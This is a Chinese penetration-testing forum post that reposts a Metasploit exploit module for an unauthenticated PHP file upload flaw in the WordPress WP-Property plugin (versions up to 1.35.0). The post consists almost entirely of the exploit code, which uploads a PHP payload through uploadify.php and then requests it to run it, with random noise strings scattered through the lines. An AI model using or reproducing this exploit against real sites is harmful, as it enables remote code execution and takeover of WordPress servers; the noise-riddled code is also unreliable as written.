找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress WP-Property PHP 文件上传漏洞
返回列表 发新帖
查看: 2685|回复: 0
打印 上一主题 下一主题

WordPress WP-Property PHP 文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-4 19:51:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WordPress WP-Property PHP 文件上传漏洞' _0 \1 h  s3 B: R3 i& u# H4 x) ^

- p$ n4 _" V" F- ^* `2 l# H ## # This file is part of the Metasploit Framework and may be subject to
7 I( F0 {7 o% D2 s" P, q) R; O  p$ h" @: o+ c
# redistribution and commercial restrictions. Please see the Metasploit
. _+ Y& L& o9 c8 q) Z: L8 W8 a( C( k. m  C6 e
# Framework web site for more information on licensing and terms of use.- R" r' r$ G1 y" Q3 K: i

% b& s: R2 u- B3 u#   http://metasploit.com/framework/ ##
; w) X& d+ u8 c: v
9 _) T7 |! n5 w) n! Q- @# n
+ l4 G9 D. j9 N" Q/ B/ J9 q1 G* L

7 `% ?3 j. W& L6 [& m$ D3 V0 Q/ k6 C2 u. b; j' P
require 'msf/core'
' B3 a2 ]4 I9 h7 H7 y- g; H) v. x* Zrequire 'msf/core/exploit/php_exe'
/ U& Z$ P( E9 o3 Q# t& j4 h: w8 L0 J9 ?2 g8 B
class Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',8 h0 b/ V# r- {8 H5 F* ?1 {- Y6 R
'Description'    => %q{- \2 A' r5 b) o) K
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>) u" @( o- _+ J
[
' o3 [' g3 W% t9 i9 ?4 n'Sammy FORGIT', # initial discovery
5 r* _) z0 v# X# C: E- }* w( K'James Fitts <fitts.james[at]gmail.com>' # metasploit module6 d& x. F; Z* Z1 \) _
],4 |7 Y6 z0 c' @% Y' h/ @" _5 ^. l/ e
'License'        => MSF_LICENSE,. O, ]! Q& ^+ ?/ ~! A. X; c# N
'References'     =>
; \. _4 w0 `8 e  M! i  C8 A[  F+ M* b; x( o. s0 |
[ 'OSVDB', '82656' ],8 h) X9 t0 H1 E' i
[ 'BID', '53787' ],  _4 N  r  X4 Z0 f- M
[ 'EDB', '18987'],( M/ x. P6 X; a* E  _
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
" g1 D4 w# h. B],
/ q3 r5 g: ?( v& L8 A8 k'Payload'        =># [9 U& X/ W* T3 L2 x, L8 t3 R
{6 h1 Z- y& U. s2 }# |0 C6 F2 ^
'BadChars' => "\x00",
! Q; [2 n0 m+ W5 ]) Y5 P" U) S},
2 s; \: A( i! B# D% M7 n. ['Platform'       => 'php',
- N( A. h6 t! s/ j: |* j5 O8 F0 L'Arch'           => ARCH_PHP,7 B0 }& t3 b; ?! h) B3 ]! f
'Targets'        =>
6 z( u* l8 o* {$ B[# e1 [: i/ a* a/ S& K& e; C) I' Z) }% P5 F
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
, @5 b6 T4 N; S' H& I[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]( r1 Y4 \1 @6 y( m5 P* g
],7 M* {2 u; ?1 K  c
'DefaultTarget'  => 0,
6 `; [7 v& L# w1 a6 R/ r'DisclosureDate' => 'Mar 26 2012'))
2 i7 q/ h2 Q; u6 ~& i# C1 k3 I0 |; q- c6 @( A
register_options() c4 g7 U8 P9 G7 H
[# L0 U7 J* B( t
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
( ?2 S' c0 d) I], self.class)4 d+ Z2 F! e* C3 {
end5 j" B  X! J0 J4 P! b
& D9 d0 I  F  S% f; y& u
def check
5 `4 V& r! u" [0 h  |& A$ R, P0 duri =  target_uri.path
! h* N* m' E1 J% E% z  V& Ruri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',
+ \3 h: x0 x% m7 Y( j* B0 _2 J; Y'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"3 f  c' Z- e4 }) c4 @
}): O5 t' S7 Z- G( E8 f
$ P% x$ e% y- ~  Z( I
if not res or res.code != 200
8 W, v; M: ]. f1 L! H" Rreturn Exploit::CheckCode::Unknown
/ |) s' C- o1 L5 r! uend1 x# f. E4 X# E$ m' L6 w

. t( P3 k5 ~# y- i! N7 u) G& yreturn Exploit::CheckCode::Appears
" A0 H* H% Z  y- h+ r$ J7 pend4 H: X1 W, l$ q1 W

: P8 k) W# K* A0 ^" mdef exploit
( T$ k/ O+ Z8 Iuri =  target_uri.path
9 m$ {9 z' Q8 V0 k% q& S9 d/ Zuri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)
- z/ {6 ^1 V  D
/ [' _1 l) `! p: B: h3 Edata = Rex::MIME::Message.new! p9 H3 [' r9 o; |
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")/ n6 n* q6 e8 x. q. V
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")6 E- c. W% Z( q/ k
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')+ y8 M  B) C8 X6 A
- B- y4 ~7 p" X: z
print_status("#{peer} - Uploading payload #{@payload_name}")$ {% w  |6 V" S. c5 S8 R
res = send_request_cgi({7 j9 [: ~# ]% ~( D; _' Q
'method' => 'POST',
6 e% }3 E! A0 o7 F8 d/ k5 O'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
9 ~7 F3 o; j  [% G" Y$ q/ J: d'ctype'  => "multipart/form-data; boundary=#{data.bound}",
+ u, n1 {1 n; k'data'   => post_data3 G: P' R6 `9 R( N
})
! n. c. l+ X  \* t. x! e1 `4 ^: v. z
if not res or res.code != 200 or res.body !~ /#{@payload_name}/; Q  q: K) i: n6 a' M
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")3 y3 j/ H; |" o8 C0 D$ v" d% |
end- ?% ~8 ~# K# q4 J( {3 l

' U6 u0 P( s; W6 B8 ?upload_uri = res.body
+ a; \" T+ B0 c8 d
0 d' J) w: q. O( @. Kprint_status("#{peer} - Executing payload #{@payload_name}")' Q: y7 T& g) a
res = send_request_raw({
, e' Z  H5 f2 g& ^'uri'    => upload_uri,
9 P) v! |3 G" x; ~1 ['method' => 'GET'4 |* e) H+ W" {- Y. B) n
})* x7 s' C3 b, ^! j
end
% f+ t1 ]8 [( p" |% iend
7 a# v8 r" w" w  ~/ M! Q0 x* N
1 ?+ f6 z  `0 d, r不要问我这写的是什么 怎么利用 我是说msf.9 g" m' v/ l& V! R2 M" G9 d
. u8 b; t/ S1 e; {' L% }
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表